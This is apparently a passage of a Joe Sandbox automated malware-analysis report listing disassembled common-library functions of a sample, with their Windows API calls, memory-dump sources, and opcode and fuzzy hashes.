                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000,00007FFD94509ED1,?,?,?,?,00007FFD94504CC7), ref: 00007FFD9450B66B
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                  • Opcode ID: c2988470996c8379b0b8b9b622bd793b46203877286ea0b4af43dca60023248b
                                                                                                                                                                                                                  • Instruction ID: b3e91077fbd88db9cb46af2ec28e26e828d0e580c0a32c832f1faef157f9473e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2988470996c8379b0b8b9b622bd793b46203877286ea0b4af43dca60023248b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B811DB28F0964242FAF667E255F113963929F4ABA0F54C735E96E066EFDE2CE841C200
                                                                                                                                                                                                                  Function 00007FFD9450B684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FFD94509A4F,?,?,00000000,00007FFD94509CEA,?,?,?,?,00000000,00007FFD94509C76), ref: 00007FFD9450B6A3
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FFD94509A4F,?,?,00000000,00007FFD94509CEA,?,?,?,?,00000000,00007FFD94509C76), ref: 00007FFD9450B6C2
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FFD94509A4F,?,?,00000000,00007FFD94509CEA,?,?,?,?,00000000,00007FFD94509C76), ref: 00007FFD9450B6EA
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FFD94509A4F,?,?,00000000,00007FFD94509CEA,?,?,?,?,00000000,00007FFD94509C76), ref: 00007FFD9450B6FB
                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FFD94509A4F,?,?,00000000,00007FFD94509CEA,?,?,?,?,00000000,00007FFD94509C76), ref: 00007FFD9450B70C
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                  • Opcode ID: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                                                                                  • Instruction ID: df22aea40d86e28d15fc7d95dd2743245398a670c105c36b05ad3041ffb15ed3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86112C18F0824242FAFA67E569F117963919F467E0F14C735E9AD0A6EFEE2CF941C200
                                                                                                                                                                                                                  Function 00007FFD944E7810 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,00000004,?,?,?,00007FFD944CF51E), ref: 00007FFD944E78FA
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                  • API String ID: 3997070919-4001610065
                                                                                                                                                                                                                  • Opcode ID: d659e471f1ce35745d001409b9ffc18a8efdd6c7f014e158c05b3e4b6dcdce9d
                                                                                                                                                                                                                  • Instruction ID: a70f4a084c6122e17d6d1a9ceb493bfa60402df85e45a0f961b8f7cc65b71584
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d659e471f1ce35745d001409b9ffc18a8efdd6c7f014e158c05b3e4b6dcdce9d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77619036B08A8286E7708F95E4A437B73A1FB86794F148135DA8D4375ADF7CE465CB00